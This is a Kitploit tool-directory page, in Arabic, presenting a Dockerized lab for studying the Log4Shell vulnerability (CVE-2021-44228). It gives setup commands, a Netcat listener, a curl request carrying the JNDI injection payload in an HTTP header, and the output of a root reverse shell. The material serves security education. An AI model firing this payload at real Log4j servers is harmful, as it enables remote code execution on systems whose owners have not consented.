Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mi-laboratorio-log4shell — مختبر آلي Plug & Play في Docker لتدقيق ودراسة ثغرة Log4Shell (CVE-2021-44228) | Kitploit
أدوات/GitHubGitHub/mafo-sec/mi-laboratorio-log4shell
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubmafo-sec/mi-laboratorio-log4shell

mi-laboratorio-log4shell

مختبر آلي Plug & Play في Docker لتدقيق ودراسة ثغرة Log4Shell (CVE-2021-44228)

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 مختبر آلي لـ Log4Shell (CVE-2021-44228) للتشغيل والتوصيل

مختبر بحث أمني آلي بأمر واحد مصمم لعرض وتدقيق ثغرة Log4Shell (CVE-2021-44228) لتنفيذ الأكواد عن بُعد (RCE).

يجمع هذا المشروع جميع المكونات الضرورية (تطبيق ضعيف، خادم إحالة LDAP خبيث، وأدوات المهاجم) في بنية تحتية شبكية موحدة ومعزولة باستخدام Docker Compose.


⚙️ الميزات الرئيسية

  • تشغيل وتوصيل 100%: لا حاجة لتكوين IP يدوي، أو تعديل ملف .env، أو محاذاة الشبكة. كل شيء يحل تلقائيًا عبر DNS الداخلي لـ Docker.
  • توافق البايت كود: يتم تجميع كود الاستغلال تلقائيًا عبر منصات متعددة لفرض التوافق مع بنية آلة جافا الافتراضية (JVM) الأقدم للضحية، مما يلغي مشاكل UnsupportedClassVersionError.
  • نشر مركزي: يتم التحكم بالكامل بواسطة طبقة تنسيق واحدة ومدير سكربت Bash تفاعلي (configurar.sh) يقوم بأتمتة هدم الحاويات، تنظيف الذاكرة المؤقتة، وإعادة البناء.

🏗️ نظرة عامة على البنية

ينشئ المختبر شبكة جسر معزولة (red-log4shell) مع ثلاثة عناصر رئيسية:

  1. الضحية (web-vulnerable): تطبيق ويب Spring Boot يستخدم نسخة غير مخففة وضعيفة من Log4j (2.14.1) تعمل على Java 8u111.
  2. خادم LDAP (ldap-malicioso): مدعوم من marshalsec لاعتراض طلبات البحث الواردة وإعادة توجيه الضحية ديناميكيًا إلى حمولة المهاجم.
  3. المهاجم (kali-tools): حاوية Kali Linux مخصصة تستضيف خادم HTTP بلغة Python لتسليم حمولة الاستغلال المترجمة (Exploit.class) وأداة استماع Netcat لالتقاط الصدفة العكسية.

⚙️ بداية سريعة

لنشر هذا المختبر على أي جهاز Linux مثبت عليه Docker، قم بتنفيذ الأوامر التالية في الطرفية الخاصة بك:

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git

# 2. Navigate to the project directory
cd mi-laboratorio-log4shell

# 3. Grant execution permissions to the script manager and launch the lab
chmod +x configurar.sh
./configurar.sh

🚀 كيفية الاستغلال (خطوة بخطوة)

بمجرد أن تكون البنية التحتية قيد التشغيل تلقائيًا عبر السكربت، اتبع هذه الخطوات لتفعيل الاستغلال والتقاط الصدفة العكسية. الخطوة 1: إعداد مستمع Netcat

افتح طرفية جديدة على جهاز المضيف (Ubuntu) واتصل بحاوية المهاجم لوضع Netcat في وضع الاستعداد للاتصالات الواردة: Bash

sudo docker exec -it kali-tools bash

داخل حاوية Kali، ابدأ المستمع: Bash

nc -lvnp 4444

سترى الرسالة: الاستماع على [أي] 4444 ... الخطوة 2: إطلاق متجه الهجوم

افتح طرفية أخرى منفصلة على جهاز المضيف وأرسل سلسلة حقن JNDI الخبيثة المضمنة في رأس X-Api-Version: Bash

curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'

الخطوة 3: التحقق من الصدفة العكسية

ارجع إلى طرفية Netcat الخاصة بك. يجب أن ترى اتصالاً نشطًا. يمكنك الآن تنفيذ الأوامر كجذر داخل خادم الضحية: Bash

connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164 whoami root


⚠️ إخلاء مسؤولية

تم إنشاء هذا المستودع بدقة لأغراض تعليمية، وبحث أمني، وتدقيق أكاديمي مصرح به. لا تقم أبدًا بتنفيذ هذه الأدوات أو مهاجمة البنية التحتية دون الحصول على إذن كتابي صريح ومسبق من مالكي البنية التحتية.

تنزيل الأداة